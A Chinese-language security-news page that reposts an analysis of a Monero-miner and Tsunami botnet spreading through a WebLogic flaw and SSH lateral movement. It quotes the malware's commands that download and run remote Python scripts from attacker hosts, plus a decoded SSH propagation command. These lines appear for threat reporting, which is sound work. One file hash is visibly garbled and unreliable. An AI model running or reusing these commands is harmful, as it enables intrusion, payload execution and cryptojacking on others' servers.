<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>
    網安 - 專業的網絡安全產業、社區、知識平臺

    具有 SSH 橫向移動功能的 Monero+Tsunami 僵尸網絡

    Andrew2020-12-03 10:57:22

    安全研究員Tolijan Trajanovski(@tolisec)分析了實現ssh橫向移動的多向量Miner + Tsunami僵尸網絡。

    安全研究員研究員0xrb與我分享了使用weblogic漏洞傳播的僵尸網絡示例。該僵尸網絡也在5天前被 @ BadPackets 發現, 并且到2020年12月1日為止仍處于活動狀態。該僵尸網絡帶有兩個有效載荷:1)Monero XMR Miner二進制文件;2)Tsunami 二進制文件。該僵尸網絡以云服務器為目標。 2020年9月 ,AWAKE Security的Patrick Olsen調查并報告了僅攜帶XMR Miner有效載荷的僵尸網絡的早期版本。

    僵尸網絡摘要

    有效負載:Monero礦工和Tsunami。
    感染媒介:Docker API,Weblogic,SSH bruteforce?,Redis?
    僵尸網絡目前正在使用Weblogic漏洞進行傳播。9月,僵尸網絡的早期版本正在使用配置錯誤的Docker API。有趣的是,當前的僵尸網絡版本包含未使用的代碼,用于利用Redis和暴力破解SSH。
    橫向移動:僵尸網絡使用SSH進行橫向移動。它嘗試感染系統先前連接的主機。
    逃避和持久性:僵尸網絡以多種方式實現持久性。殺死正在運行的進程,潛在地爭奪挖掘工具并消除EDR。使用base64編碼的中間階段shell腳本和base64編碼的命令來下載和執行python腳本。
    AWAKE的Patrick Olsen對以前版本的出色分析:https: //awakesecurity.com/blog/threat-hunting-to-find-misconfigured-docker-exploitation/

    此版本的僵尸網絡有哪些新功能?

    • 除了Monero XMR挖礦機之外,Tsunami還添加為第二個有效載荷
    • 利用Oracle WebLogic RCE進行傳播
    • 消除了EDR和監控工具,阿里巴巴的Aliyun和騰訊的qcloud
    • 對SSH橫向移動使用改進的功能,該功能枚舉ssh用戶,密鑰,主機和端口
    • 使用具有不同放置位置的多個shell腳本和python腳本,使用硬編碼的IP地址和域連接到二進制托管Web服務器
    • 包含未使用的代碼,這些代碼用于使用masscan掃描SSH和Redis服務以及使用Redis-cli和SSH蠻力工具感染服務器

    分析

    第1階段– WebLogic利用CVE-2020-14882

    poc.xml SHA256:af1f3e57544583561dbd02201407782aef7dce47489e703ad6ac9f231363b439

    階段1執行兩個有效負載,一個shell腳本,xms和一個python腳本。shellscript xms通過curl從bash傳遞到bash,以防萬一失敗,使用wget對其進行提取,執行和刪除,以防止分析。使用base64編碼命令來獲取并執行python腳本,以避免檢測和分析。

    海嘯僵尸網絡

    回顯的base64編碼的字符串解析為以下內容:python -c'import urllib; exec(urllib.urlopen(“ hxxp://205.185.116.78/d.py”).read())'

    第2階段A)– xms shell腳本

    xms shell腳本SHA256:72acbfdeadfa31d7ccda7fdcc93944b1948e263239af8850e5b44c518da0a4c5

    執行的動作:

    1. 配置外殼路徑
    2. 如果SELinux處于強制模式,則將其切換到許可模式
    3. 將用戶進程的限制設置為50000
    4. 將RedHat大頁面的數量設置為虛擬CPU內核數量的三倍
    5. 清除LD預加載
    6. 終止在以下端口上通信的進程:3333、4444、5555、7777、14444、5790、45700、2222、9999、20580和13531。還終止與這些服務連接的進程:23.94.24.12:8080和134.122.17.13:8080。這些行為可能會殺死以前運行的軟件和潛在的競爭機器人。
    7. 生成一個隨機數,并根據該隨機數將線程設置為300或800->在未使用/注釋過的SSH bruteforce代碼中使用
    8. 卸載DER
      • 檢查是否安裝了AliBaba安全代理Aliyun,如果是,則將其卸載
      • 檢查是否安裝了qcloud(由騰訊進行的云監控),如果是,則將其卸載
    9. 獲取主機的WAN IP地址的/ 16范圍
    10. 檢查pool.supportxmr.com是否可訪問
    11. 檢查bash.givemexyz.in是否可訪問,是否執行以下操作:
      • python -c’import urllib; exec(urllib.urlopen(“ hxxp://bash.givemexyz.in/dd.py”).read())’
    12. 如果無法訪問bash.givemexyz.in,則執行以下操作:
      • python -c’導入urllib; exec(urllib.urlopen(“ hxxp://205.185.116.78/d.py”).read())’

    SSH橫向移動:xms shell腳本嘗試感染服務器先前已連接到的主機。

    • 它使用icanhazip.com解析受害主機IP
    • 它枚舉用戶,主機,鍵和端口,并運行4個嵌套循環以嘗試所有組合
    • 為了找到此信息,它解析id_rsa *;。.ssh / config; .bash_history; 和主目錄和根目錄中的.pem文件。它還列出了正在運行的進程,以獲取有關活動SSH連接的信息。

    海嘯僵尸網絡

    持久性:持久性機制與僵尸網絡的先前版本相同。

    • xms腳本通過cronjobs實現了持久性,該cronjobs每分鐘,每2分鐘,每3分鐘,每30分鐘和每小時下載并執行xms shell腳本和python腳本。
    • /etc/cron.d/root
    • /etc/cron.d/apache
    • / var / spool / cron / root
    • / var / spool / cron / crontabs / root
    • /etc/cron.hourly/oanacroner1
    • 它還覆蓋/etc/init.d/down以確保系統啟動時的持久性。

    階段2 B)Python腳本

    共有4個python腳本。它們分為2組。第一組下載并運行Miner二進制文件和隨附的shell腳本,維護持久性并下載并運行第二組python腳本。第二組python腳本下載并運行Tsunami二進制文件。每個組都有兩個腳本:一個從硬編碼的IP中獲取垃圾箱,而另一個則使用域連接到托管有效負載的Web服務器。同一組中的腳本還會將垃圾箱放置到不同的位置,即/ tmp/ var / tmp中。

    d.py->
    1)從硬編碼IP 205.185.116.78下載go shell腳本和Miner二進制文件,并通過go腳本執行Miner二進制文件。下載并執行b.py。
    2)獲取并執行以下外殼程序腳本:
    a)執行以下命令:python -c'import urllib; exec(urllib.urlopen(“ hxxp://bash.givemexyz.in/dd.py”).read())'或如果Givemexyz Web服務器不可用:
    python -c'import urllib; exec(urllib.urlopen(“ hxxp://205.185.116.78/b.py”).read())'
    b)使用cron
    dd保持持久性。 py python腳本的行為與d.py相同,但它從bash.givemexyz.in獲取Miner二進制文件。

    海嘯僵尸網絡

    階段3)A)Monero XMR Miner ELF二進制

    文件二進制文件與名為go的shell腳本一起下載。“ go” shell腳本用于執行Miner二進制文件。二進制文件使用默認的UPX打包程序打包。
    x86_64 SHA256:fdc7920b09290b8dedc84c82883b7a1105c2fbad75e42aea4dc165de8e1796e3 i686
    SHA256:35e45d556443c8bf4498d8968ab2a79e751fc2d359bf9f6b4dfd86d7f9c9f9c9b3c6b3c7f3c3f3d3c3f3d3c3f3d3d3df3d3df3d3df3d3d3d3d3d3d3d3dfdfdfdfd

    海嘯僵尸網絡3

    Miner ELF二進制文件連接到以下挖掘代理服務器:
    66.70.218.40 : 8080

    階段3)B)Tsunami

    Tsunami二進制文件針對x86和x86_64體系結構進行了編譯,與Miner二進制文件類似,它們也都裝有UPX。
    他們連接到以下C2服務器:104.244.75.25:443
    x32b SHA256:9b8280f5ce25f1db676db6e79c60c07e61996b2b68efa6d53e017f34cbf9a872
    x64b SHA256:855557e415b485cedb9dc2c6f96d524143108a2f8442

    第2階段“ xms” shell腳本
    SSH掃描程序和漏洞
    1.使用masscan掃描開放端口22的以下范圍:10.0.0.0/8 172.16.0.0/12 192.168.0.0/16
    2.使用SSH蠻力工具通過打開SSH端口攻擊已發現的服務器
    解碼SSH攻擊命令base64:RSAKEY =“否” SCP =“否” SCPFILE =” / tmp / linux.tar.gz” SCPPATH =” / tmp” CMD =” cd / tmp; tar -xvf /tmp/linux.tar.gz; chmod 777 / tmp / i686 / tmp / x86_64 / tmp / go; / tmp / go“ PORT =” 22“ UserKnownHostsFile =”“” BatchMode =“ no” ConnectTimeout =“ 15” StrictHostKeyChecking =“ no” Format =“ USER PASS IP” / tmp / sshexec /tmp/sparte.txt
    海嘯僵尸網絡

    Redis用于感染LAN中的服務器
    1.掃描LAN中具有開放端口6379的設備,并將它們添加到列表中

    海嘯僵尸網絡

    僵尸網絡ssh
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    加密采礦團伙幫僵尸網絡,將感染主機擴大至30,000臺
    2022-07-28 14:21:37
    據了解,該團伙主要就是專注于感染主機,并且還會通過知道的漏洞以及暴力攻擊的手段來進行加密貨幣礦工活動。該團伙還會利用互聯網的可訪問性,來進行識別和選擇受害者。但是可以知道的是,感染腳本的最新版本是通過阻止列表來進行避免感染待機主機的。
    8220幫云僵尸網絡感染全球3萬臺主機
    2022-07-21 00:00:00
    SentinelOne 的研究人員報告說,低技能犯罪軟件8220 Gang在上個月已將其 Cloud Botnet 擴展到全球約 30,000 臺主機。 該團伙專注于感染云主機,通過利用已知漏洞和進行暴力攻擊來部署加密貨幣礦工。
    滲透測試工具實戰使用技巧合集
    2023-04-12 10:00:08
    nmap -PN -sS -sV --script=vulscan –script-args vulscancorrelation=1 -p80 target. nmap -PN -sS -sV --script=all –script-args vulscancorrelation=1 target. NetCat,它的實際可運行的名字叫nc,應該早很就被提供,就象另一個沒有公開但是標準的Unix工具。
    滲透工具實戰技巧大合集
    2021-12-10 06:36:00
    剛入行時在網上搜各種工具使用技巧及方法,通過別人的經驗提高自身的技巧,然后再拿個小本本記錄,這是每個網安人初入行時的必備姿勢,那么今天丹丹就拿起先前做過的筆記和網上別人的經驗做一個合集,把大部分使用到的工具技巧整理成冊,后續自己以及大家查閱,如總結不到位的地方希望海涵,那現在就開始吧。。。。。
    具有 SSH 橫向移動功能的 Monero+Tsunami 僵尸網絡
    2020-12-03 10:57:22
    2020年9月 ,AWAKE Security的Patrick Olsen調查并報告了僅攜帶XMR Miner有效載荷的僵尸網絡的早期版本。僵尸網絡目前正在使用Weblogic漏洞進行傳播。殺死正在運行的進程,潛在地爭奪挖掘工具并消除EDR。shellscript xms通過curl從bash傳遞到bash,以防萬一失敗,使用wget對其進行提取,執行和刪除,以防止分析。使用base64編碼命令來獲取并執行python腳本,以避免檢測和分析。第一組下載并運行Miner二進制文件和隨附的shell腳本,維護持久性并下載并運行第二組python腳本。
    針對Linux SSH 服務器的新型僵尸網絡,可以暴力破解服務器
    2022-08-08 10:49:15
    目前安全研究員還未能分析出RapperBot僵尸網絡的主要目標對象,我們需要對該僵尸網絡保持警惕的心理。此外,僵尸網絡攻擊還可以竊取個人的數據信息,以及使用被感染的設備進行訪問網站,從而造成虛假的流量。
    FritzFrog 新型 P2P 僵尸網絡,已侵入 500 多臺 SSH 服務器
    2020-08-20 11:08:39
    Guardicore Labs的研究人員發現了一個復雜的點對點(P2P)僵尸網絡,該僵尸網絡自2020年1月一直活躍于全球SSH服務器。 該僵尸網絡被稱為FritzFrog,它被觀察到試圖使用暴力破解并傳播到數千萬個IP地址,包括政府辦公室...
    僵尸網絡對互聯網進行大規模掃描以尋找不安全的 ENV 文件
    2020-11-23 11:39:04
    威脅者正在尋找通常存儲在ENV文件中的API令牌,密碼和數據庫登錄名。由于它們保存的數據的性質,ENV文件應始終存儲在受保護的文件夾中。超過2800個不同的IP地址已經被用來掃描ENV文件,在過去的三年中,有超過1100臺掃描儀是活躍在過去一個月內,據安全廠商Greynoise。建議開發人員進行測試,看看他們的應用程序的ENV文件是否可以在線訪問,然后保護任何意外暴露的ENV文件。
    基于Mirai的NoaBot僵尸網絡利用Cryptominer瞄準Linux系統
    2024-01-12 09:33:28
    又一天,又一個針對 Linux 系統的惡意軟件威脅!NoaBot和Mirai之間的一個顯著區別是,僵尸網絡不是針對DDoS攻擊,而是針對連接SSH連接的弱密碼來安裝加密貨幣挖掘軟件。
    P2PInfect僵尸網絡急速擴張,攻擊頻率激增600倍,全球大規模入侵
    2023-09-22 09:05:47
    P2PInfect僵尸網絡蠕蟲從8月下旬開始經歷一段活動量高度上升的時期,然后在2023年9月再次上升。P2PInfect于2023年7月由Unit42首次記錄為一種對等惡意軟件,該惡意軟件在暴露于互聯網的Windows和Linux系統上使用遠程代碼執行缺陷破壞Redis實例。
    Andrew
    暫無描述
      亚洲 欧美 自拍 唯美 另类